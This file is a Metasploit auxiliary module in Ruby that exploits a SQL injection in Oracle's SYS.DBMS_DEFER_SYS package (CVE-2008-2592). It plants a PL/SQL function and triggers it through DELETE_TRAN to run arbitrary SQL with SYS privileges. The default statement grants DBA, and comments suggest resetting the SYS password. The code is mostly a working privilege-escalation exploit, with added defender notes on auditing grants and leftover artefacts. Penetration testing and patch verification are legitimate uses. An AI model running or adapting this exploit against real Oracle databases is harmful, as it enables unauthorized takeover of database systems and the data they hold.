##
# $Id: dbms_defer_sys.rb
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'

# Auxiliary module for CVE-2008-2592: a SQL injection in the Oracle
# SYS.DBMS_DEFER_SYS package (fixed in the July 2008 Critical Patch Update,
# see the references below). The module installs a caller-owned PL/SQL
# function whose body runs the contents of the SQL option, then passes the
# function's name into SYS.DBMS_DEFER_SYS.DELETE_TRAN so the package
# evaluates it with SYS privileges.
#
# Defender notes (grounded in this file):
# * The only precondition is EXECUTE on SYS.DBMS_DEFER_SYS; on an unpatched
#   instance the exposure is bounded by who holds that grant, so auditing and
#   tightening it is the mitigation short of applying the CPU.
# * A run leaves behind a function owned by the connecting user with a random
#   1-8 letter name (nothing in this module drops it) and a call to
#   DELETE_TRAN with a function name in the argument; both are auditable
#   artefacts of this technique.
class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::ORACLE

  # Registers module metadata and the two user options.
  #
  # NOTE(review): 'DBA' is registered but never read in this file -- run
  # only reads datastore['SQL']. The default SQL 'GRANT DBA TO SCOTT' is
  # what actually names the target user.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SQL Injection via SYS.DBMS_DEFER_SYS',
      'Description'    => %q{
        This module will exploits a SQL Injection vulnerability in the SYS.DBMS_DEFER_SYS
        package. Any Oracle database user with EXECUTE privilege on the package SYS.DBMS_DEFER_SYS
        can exploit this vulnerability. By default, users granted DBA have the required privilege
        or anyone who is granted EXECUTE on SYS.DBMS_DEFER_SYS. Exploitation of this vulnerability
        allows an attacker to execute SQL commands with SYS privilege
        Affected versions: Oracle Database Server versions 9iR1, 9iR2, 10gR1, 10gR2 and 11gR1.
        Fixed with Oracle Critical Patch update July 2008. See additional comments in source.
      },
      'Author'         => 'CG |at| carnal0wnage |dot| com',
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision:$',
      'References'     =>
        [
          [ 'CVE', '2008-2592'],
          [ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-05.shtml'],
          [ 'URL', 'http://seclists.org/fulldisclosure/2008/Aug/0229.html'],
        ],
      'DisclosureDate' => 'JULY 29 2008'))

    register_options(
      [
        OptString.new('DBA', [ false, 'DB user to elevate to DBA.', 'SCOTT']),
        OptString.new('SQL', [ false, 'The SQL to execute.', 'GRANT DBA TO SCOTT']),
      ], self.class)
  end

  #from: http://seclists.org/fulldisclosure/2008/Aug/0229.html
  #The DBA role in Oracle Database is not the same as SYSDBA privilege,
  #which is granted to SYS. There are many things that a user granted the
  #DBA role can't do - the most important being the ability to alter SYS
  #owned objects. This is true on databases where
  #O7_DICTIONARY_ACCESSIBILITY=FALSE (default value).
  #read the rest of the FD post for more usage ideas

  # Entry point. Connects with the ORACLE mixin, creates the helper function
  # and then triggers it through DELETE_TRAN. Two statements are sent via
  # prepare_exec; no result set is read back (see the comment below).
  #
  # Caveats visible in this code:
  # * datastore['SQL'] is upper-cased as a whole, so any quoted literal in it
  #   (e.g. a password in the ALTER USER example below) is upper-cased too.
  # * The SQL is interpolated verbatim inside a single-quoted PL/SQL string
  #   literal, so a statement containing a single quote will not compile.
  def run
    # Explicit connection handle; closed again at the end of the method.
    # Whether prepare_exec reuses this session or opens its own is a mixin
    # detail not visible here -- TODO confirm against Msf::Exploit::ORACLE.
    c = connect

    # Random 1-8 letter name for the helper function (rand(8) gives 0..7).
    p = Rex::Text.rand_text_alpha(rand(8) + 1)
    query = datastore['SQL'].upcase

    # fun queries
    # set SQL "alter user SYS identified by my!supersecretpassword "
    # connect as: sys/my!supersecretpasswordr@IP/SID as sysdba
    # set SQL "GRANT DBA to user"

    # AUTHID CURRENT_USER + AUTONOMOUS_TRANSACTION: the function body runs
    # and commits on its own, independent of the caller's transaction.
    function = "
      CREATE OR REPLACE FUNCTION #{p}
      RETURN NUMBER AUTHID CURRENT_USER AS
      PRAGMA AUTONOMOUS_TRANSACTION;
      BEGIN
      EXECUTE IMMEDIATE '#{query}';
      COMMIT;
      RETURN(0);
      END;
    "

    #so far I havent figured out how to see the output of the query with this module
    # The user executing this module will have to be DBA or have execute privileges on the SYS.DBMS_DEFER_SYS package (which is just DBA by default)
    # The first argument is built so that the package ends up evaluating
    # <connecting user>.<function name> -- 'user' here is Oracle's USER
    # function, resolved server-side, not a Ruby variable.
    call = "
      BEGIN
      SYS.DBMS_DEFER_SYS.DELETE_TRAN ('''||'||user||'.#{p}||''','');
      END;
    "

    print_status("Sending function..")
    prepare_exec(function)
    print_status("Calling SYS.DBMS_DEFER_SYS.DELETE_TRAN...")
    prepare_exec(call)

    # The helper function created above is intentionally (or at least
    # currently) left in place; there is no DROP FUNCTION step.
    c.disconnect
  end
end